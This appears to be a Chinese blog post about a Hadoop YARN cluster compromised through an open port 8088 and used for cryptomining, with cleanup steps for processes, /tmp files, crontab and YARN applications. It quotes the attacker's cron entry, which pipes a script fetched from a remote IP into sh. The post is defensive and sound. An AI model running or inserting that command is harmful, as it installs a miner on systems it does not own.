之前用三台云服务器搭建完集群后发现任务运行的特别慢 yarn:8088页面后发现有很多奇怪的任务在跑
而且这些任务怎么都完不成还一直在生成,查看各种log日志怎么也没有exception。
后来看了https://www.cnblogs.com/daxiangfei/p/9198856.html 才发现原来是被攻击了。
查看进程发现cup占用异常的高应该是黑客用机器去挖矿了。。。。。
解决方法:
1、删除异常进程
首先使用top 命令 查看当前进程 找到cpu占用异常多的进程记下它的PID(按q退出top状态)
然后使用sudo kill (PID号)结束该进程。
2、删除异常文件
检查/tmp和/var/tmp目录,删除java、ppc、w.conf等异常文件
3、检查定时任务
通过crontab -l 查看 是否有一个* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1任务
通过crontab -e 删除该任务(具体操作和vi编辑器相同)
4、删除异常yarn任务
排查YARN日志,确认异常的application,kill掉相应进程,可以通过8088窗口点击任务后点击右上角kill Application删除
再通过top验证看是否还有高cpu进程,如果有,kill掉,没有的话应该正常了。
黑客可能是通过8088的web界面进行注入攻击的,之前我为了方便集群配置开放了所有端口看来这样危险很大,之后配置的时候要注意端口安全的问题。